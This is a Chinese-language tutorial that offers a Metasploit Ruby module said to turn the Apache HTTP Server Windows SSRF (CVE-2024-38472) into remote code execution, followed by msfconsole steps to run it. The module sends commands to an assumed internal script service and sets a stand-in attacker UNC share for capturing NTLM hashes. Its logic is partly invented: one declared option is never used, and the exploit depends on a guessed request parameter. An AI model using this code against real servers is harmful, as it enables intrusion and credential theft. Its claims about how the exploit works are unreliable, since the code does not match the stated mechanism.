
Metasploit模块,利用Windows上Apache HTTP Server的SSRF(CVE-2024-38472)访问内部服务并实现远程代码执行。
在 Apache HTTP Server 的 Windows 版本中,为 SSRF 漏洞(CVE-2024-38472)创建一个远程代码执行(RCE)Metasploit 模块具有挑战性,因为 SSRF 本身并不能直接导致 RCE。然而,SSRF 通常可以作为实现 RCE 的一个步骤,特别是当你可以利用它与内部服务交互或触发次要漏洞时。
要实现通过 SSRF 的 RCE,通常需要:
在本示例中,假设我们可以触发一个内部服务,该服务接受 HTTP 请求并可能被骗取执行任意代码(例如 Jenkins 服务器或其他具有暴露 API 的服务)。
我们将编写一个 Metasploit 模块,该模块尝试通过利用 SSRF 与内部服务交互来实现 RCE。在本例中,我们将模拟一个具有暴露脚本控制台的内部 Jenkins 服务器,该控制台可被滥用实现 RCE。
将以下代码保存为 apache_unc_ssrf_rce.rb,放在 Metasploit Framework 安装目录的 modules/exploits/multi/http 下。
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache HTTP Server Windows UNC SSRF to RCE',
'Description' => %q{
This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
services like Jenkins.
},
'Author' =>
[
'Your Name' # Your name or handle
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-38472'],
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => ['win'],
'Arch' => [ARCH_CMD],
'Targets' => [
['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOSTS,
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
})
if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
ssrf_payload = {
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'version' => '1.1',
'headers' => {
'Host' => datastore['RHOSTS'],
'Content-Type' => 'application/x-www-form-urlencoded'
},
'data' => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
}
begin
print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
res = send_request_cgi(ssrf_payload)
if res && res.code == 200
print_good("Successfully triggered the internal service")
else
print_error("Failed to trigger the internal service: #{res.inspect}")
end
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
rescue ::Interrupt
print_status("User interrupted the module execution")
rescue ::Exception => e
print_error("An unexpected error occurred: #{e.message}")
end
end
end
保存模块:
将模块保存为 apache_unc_ssrf_rce.rb,放在 Metasploit Framework 安装目录的 modules/exploits/multi/http 下。
/path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
加载 Metasploit: 通过打开终端并运行以下命令启动 Metasploit Framework:
msfconsole
使用新模块: 在 Metasploit 控制台中,使用以下命令加载新的漏洞利用模块:
use exploit/multi/http/apache_unc_ssrf_rce
配置并运行:
设置必要选项,如 RHOSTS、RPORT、TARGETURI、UNC_SERVER、INTERNAL_SERVICE 和 CMD。然后运行模块。
msf6 > use exploit/multi/http/apache_unc_ssrf_rce
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
UNC_SERVER => \\attacker-server\share
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
INTERNAL_SERVICE => http://internal-service/script
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
这个增强版的 Metasploit 模块向易受攻击的 Windows 版 Apache HTTP 服务器发送特制请求,尝试触发 SSRF 漏洞,并通过与内部服务交互来实现 RCE。根据漏洞的具体性质和目标环境,调整有效载荷和模块。